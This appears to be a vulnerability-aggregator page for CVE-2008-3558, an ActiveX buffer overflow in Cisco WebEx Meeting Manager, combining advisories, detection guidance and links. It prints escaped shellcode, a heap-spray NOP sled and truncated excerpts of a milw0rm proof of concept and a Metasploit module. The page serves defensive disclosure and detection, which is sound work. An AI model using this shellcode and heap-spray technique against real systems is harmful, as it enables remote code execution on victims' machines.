CVE-2008-3558
published 2008-08-08CVE-2008-3558: Stack-based buffer overflow in the WebexUCFObject ActiveX control in atucfobj.dll in Cisco WebEx Meeting Manager before 20.2008.2606.4919 allows remote…
PriorityP261critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
65.39%
99.2th percentile
Stack-based buffer overflow in the WebexUCFObject ActiveX control in atucfobj.dll in Cisco WebEx Meeting Manager before 20.2008.2606.4919 allows remote attackers to execute arbitrary code via a long argument to the NewObject method.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cisco | webex_meeting_manager | — | — |
| cisco | webex_meeting_manager_activex_control | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u535c%u5359%u4554%u334d%u5c32%u4143%u434c%u452e%u4558%u4100
bytes↗
%u0909%u0909 (heap spray NOP sled)
- →Detect instantiation of the vulnerable ActiveX control by its CLSID (32E26FD9-F435-4A20-A561-35D4B987CFDC) or ProgID (WebexUCFObject.WebexUCFObject) in HTML/script content. ↗
- →Detect heap-spray pattern using the 0x0909 NOP-equivalent sled (unescape('%u0909%u0909')) combined with shellcode targeting return address 0x0c0c0c0c. ↗
- →Flag presence of atucfobj.dll versions prior to 20.2008.2606.4919 on endpoints; the exploit was tested against v20.2008.2601.4928. ↗
- →The Metasploit module uses EXITFUNC=process and an auto-migrate post-exploitation step; monitor for unexpected process migration activity following iexplore.exe spawning atucfobj.dll. ↗
- ·The exploit payload space is limited to 1024 bytes with null bytes (%x00) as bad characters; payloads exceeding this or containing null bytes will fail. ↗
- ·The exploit relies on a heap-spray technique to deliver the payload unmodified into memory due to input restrictions imposed by the sprintf copy path. ↗
- ·The PoC was tested only against IE6 on Windows XP SP1; behaviour on other browser/OS combinations is not confirmed by the original exploit author. ↗
- ·Cisco's remediation is delivered automatically when users connect to the WebEx meeting service; users unable to connect require a manual workaround. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Cisco
Vulnerability in Cisco WebEx Meeting Manager ActiveX Control
vendor_cisco·2008-08-14
CVE-2008-3558 [CRITICAL] CWE-119 Vulnerability in Cisco WebEx Meeting Manager ActiveX Control
Vulnerability in Cisco WebEx Meeting Manager ActiveX Control
A buffer overflow vulnerability exists in an ActiveX control used by
the WebEx Meeting Manager. Exploitation of this vulnerability could allow a
remote attacker to execute arbitrary code on the user client machine. The WebEx
Meeting Manager is a client-side program that is provided by the Cisco WebEx
meeting service. The Cisco WebEx meeting service automatically downloads,
installs, and configures Meeting Manager the first time a user begins or joins
a meeting.
When users connect to the WebEx meeting service, the WebEx Meeting
Manager is automatically upgraded to the latest version. There is a manual
workaround available for users who are not able to connect to the WebEx meeting
service.
Cisco WebEx is in the process of upgrad
Cisco
Vulnerability in Cisco WebEx Meeting Manager ActiveX Control
vendor_cisco
CVE-2008-3558 Vulnerability in Cisco WebEx Meeting Manager ActiveX Control
CVE-2008-3558: Vulnerability in Cisco WebEx Meeting Manager ActiveX Control
A buffer overflow vulnerability exists in an ActiveX control used by the WebEx Meeting Manager. Exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the user client machine. The WebEx Meeting Manager is a client-side program that is provided by the Cisco WebEx meeting service. The Cisco WebEx meeting service automatically downloads, installs, and configures Meeting Manager the first time a user begins or joins a meeting. When users connect to the WebEx meeting service, the WebEx Meeting Manager is automatically upgraded to the latest version. There is a manual workaround available for users who are not able to connect to the WebEx meeting service. Cisco WebEx is in the proce
GHSA
GHSA-g6x7-m6fm-69fg: Stack-based buffer overflow in the WebexUCFObject ActiveX control in atucfobj
ghsa_unreviewed·2022-05-02
CVE-2008-3558 [HIGH] CWE-119 GHSA-g6x7-m6fm-69fg: Stack-based buffer overflow in the WebexUCFObject ActiveX control in atucfobj
Stack-based buffer overflow in the WebexUCFObject ActiveX control in atucfobj.dll in Cisco WebEx Meeting Manager before 20.2008.2606.4919 allows remote attackers to execute arbitrary code via a long argument to the NewObject method.
No detection rules found.
Exploit-DB
Cisco WebEx Meeting Manager UCF - 'atucfobj.dll' ActiveX NewObject Method Buffer Overflow (Metasploit)
exploitdb·2010-09-20
CVE-2008-3558 Cisco WebEx Meeting Manager UCF - 'atucfobj.dll' ActiveX NewObject Method Buffer Overflow (Metasploit)
Cisco WebEx Meeting Manager UCF - 'atucfobj.dll' ActiveX NewObject Method Buffer Overflow (Metasploit)
---
##
# $Id: webex_ucf_newobject.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in WebEx's WebexUCFObject
ActiveX Control. If an long string is passed to the 'NewObject' method, a stack-
based buffer overflow will occur when copying attacker-supplied data using the
Exploit-DB
Cisco WebEx Meeting Manager UCF - 'atucfobj.dll' ActiveX Remote Buffer Overflow
exploitdb·2008-08-10
CVE-2008-3558 Cisco WebEx Meeting Manager UCF - 'atucfobj.dll' ActiveX Remote Buffer Overflow
Cisco WebEx Meeting Manager UCF - 'atucfobj.dll' ActiveX Remote Buffer Overflow
---
// k`sOSe 08/08/2008
// tested in IE6, XP SP1
var shellcode = unescape("%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%u315f%u60f6%u6456%u468b%u8b30%u0c40%u708b%uad1c%u688b%u8908%u83f8%u6ac0%u6850%u8af0%u5f04%u9868%u8afe%u570e%ue7ff%u3a43%u575c%u4e49%u4f44%u5357%u535c%u5359%u4554%u334d%u5c32%u4143%u434c%u452e%u4558%u4100");
var block = unescape("%u0909%u0909");
while (block.length
# milw0rm.com [2008-08-10]
Metasploit
WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow
metasploit
WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow
WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow
This module exploits a stack-based buffer overflow in WebEx's WebexUCFObject ActiveX Control. If a long string is passed to the 'NewObject' method, a stack- based buffer overflow will occur when copying attacker-supplied data using the sprintf function. It is noteworthy that this vulnerability was discovered and reported by multiple independent researchers. To quote iDefense's advisory, "Before this issue was publicly reported, at least three independent security researchers had knowledge of this issue; thus, it is reasonable to believe that even more people were aware of this issue before disclosure." NOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload into memory unmodified.
No writeups or analysis indexed.
http://lists.grok.org.uk/pipermail/full-disclosure/2008-August/063692.htmlhttp://secunia.com/advisories/31397http://www.cisco.com/en/US/products/products_security_advisory09186a00809e2006.shtmlhttp://www.kb.cert.org/vuls/id/661827http://www.securityfocus.com/bid/30578http://www.securitytracker.com/id?1020641http://www.vupen.com/english/advisories/2008/2319https://exchange.xforce.ibmcloud.com/vulnerabilities/44250https://www.exploit-db.com/exploits/6220http://lists.grok.org.uk/pipermail/full-disclosure/2008-August/063692.htmlhttp://secunia.com/advisories/31397http://www.cisco.com/en/US/products/products_security_advisory09186a00809e2006.shtmlhttp://www.kb.cert.org/vuls/id/661827http://www.securityfocus.com/bid/30578http://www.securitytracker.com/id?1020641http://www.vupen.com/english/advisories/2008/2319https://exchange.xforce.ibmcloud.com/vulnerabilities/44250https://www.exploit-db.com/exploits/6220
2008-08-08
Published